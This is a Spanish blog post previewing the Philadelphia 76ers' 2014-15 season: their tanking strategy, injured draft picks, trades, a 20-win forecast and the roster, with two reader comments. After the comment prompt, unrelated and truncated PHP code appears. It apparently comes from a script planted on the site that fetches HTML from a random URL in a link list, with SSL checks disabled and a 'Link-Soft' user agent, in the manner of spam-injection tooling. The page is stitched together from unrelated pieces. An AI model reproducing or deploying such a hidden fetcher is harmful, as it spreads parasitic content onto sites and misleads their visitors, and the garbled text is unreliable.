Philadelphia 76ers 2014-2015: La derrota como objetivo

28 de October de 2014 por Simon

365 días después nada ha cambiado en las perspectivas a corto plazo de la franquicia de la ciudad del amor fraternal. El año pasado dieron una mucha mejor imagen de la que se podía esperar y muchos ya empezábamos a ver a un equipo que podía empezar a despegar a partir de esta misma temporada con las piezas que llegaran desde el Draft, la recuperación de Noel y el crecimiento de los jóvenes jugadores pero cuanto más se empeñaban los jóvenes en ganar partidos y crecer, más se esforzaban desde los despachos para perder los máximos partidos posibles sin importar el qué dirán. Así se plantea una nueva temporada, con el objetivo, una vez más, de tirarlo desde el inicio.

Sixers 2014

Movimientos clave

En un equipo cuya máxima aspiración era lograr una posición de Draft ventajosa es de esperar que el mayor refuerzo para la siguiente campaña venga vía Draft… pero este no es el caso. Los Sixers decidieron, un año más, gastar su ronda en un jugador interior lesionado de larga duración. Joel Embiid fue el elegido para liderar este proyecto hacia cotas más altas pero difícilmente empezará a hacerlo este año. La otra elección de primera ronda que tenían los Sixers decidieron gastarla en otro jugador que -¡sorpresa!- tampoco jugará la temporada que viene en la NBA, un Darío Saric que poco antes del Draft anunció un acuerdo con el Anadolu Efes que retrasará su salto a la NBA. En el apartado de traspasos tenemos la salida de Thaddeus Young como principal movimiento. Young era demasiado bueno para jugar en estos Sixers, quizás ayudaría a ganar algunos partidos extra o aconsejaría a los jóvenes sobre cómo hacerlo. Mejor cambiarlo por Shved y Mbah a Moute, que ayudarán sin duda mucho más a perder partidos. Hace unos días llegó el base Marquis Teague, jugador joven y con talento, el cual los Sixers esperan que desarrolle a partir de ahora.

Qué esperamos de ellos

Pues poco o nada. El único atractivo que tendrán los Sixers será ver por fin en la NBA a Nerlens Noel, que puede empezar a fijar cuál puede ser el techo de este equipo en un futuro. El resto del equipo está bastante empeorado. Sin Young ni Hawes y la lesión de Embiid la pintura será probablemente la peor que se recuerda en un equipo de NBA y es que, salvo Noel, ningún otro de los interiores tendría hueco en ninguna otra plantilla de la liga. Por mucho que haya trabajado Noel, lo cierto es que estaba muy verde cuando dio el salto y tras un año sin jugar vemos improbable que sea capaz de dar un impacto inmediato. Apenas dos jugadores potables más quedan en plantilla: Tony Wroten, que debería de estar ante su campaña de despegue, y el ROY de la campaña pasada, MCW, que debería de sufrir el hecho de que su equipo sea aún peor que la temporada pasada. Por tanto, los 76ers están abocados al último lugar de la liga. Por plantilla y por deseo de la directiva no vemos otra posibilidad.

Pronóstico

20 victorias.

Plantilla

PG: Carter-Williams, Teague, Shved,
SG: Hollis Thompson, Wroten, Williams, Richardson, Malcom Lee
SF: Mbah a Moute, KJ McDaniels, Grant, Chris Johnson
PF: Moultrie, Brandon Davies
C: Noel, Embiid, Sims

Comenta

2 comentarios a esta entrada

  1. jmpa dice:
    #1

    Sólo hay que comparar la cara de circunstancias MCW y Noel con la de fotos de jugadores importantes en otras franquicias que habéis publicado antes, por ejemplo New Orleans, Orlando…

      Citar

  2. Denise dice:
    #2

    La reconstrucción de los 76ers creo que empezó bien, pero después a Sam Hinkie se le ha ido la olla con lo del tanking. Draftear jugadores lesionados es un arma de doble filo, y luego, pues chico, si fuese aficionado de los 76ers estaría cabreado y rompería mi abono en 3000 pedazos. Creo que se puede reconstruir un equipo y hacerlo ganador en 3 años (y más en esta franquicia histórica en un pedazo ciudad como Philly) antes que estar un par de años jugando con tios que no tienen nivel para la liga. Encima se han deshecho hasta de James Anderson, que en el unico partido de Philly que ví el curso pasado, se marcó un señor partido.

    De lo que hay potable, quitando a Noel y MCW, Tony Wroten y Shved me parecen buenos jugadores, en caso del ruso, creo que no le dieron bola ni confianza en Minny, pero es más jugador de lo que hemos visto.

    Txusma, eres un cachondo, me gustan tus chistes del Twitter jeje, confirmame porfa si en la porra me has cambiado los Pelicans por Dallas como equipo de PO. Gracias.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>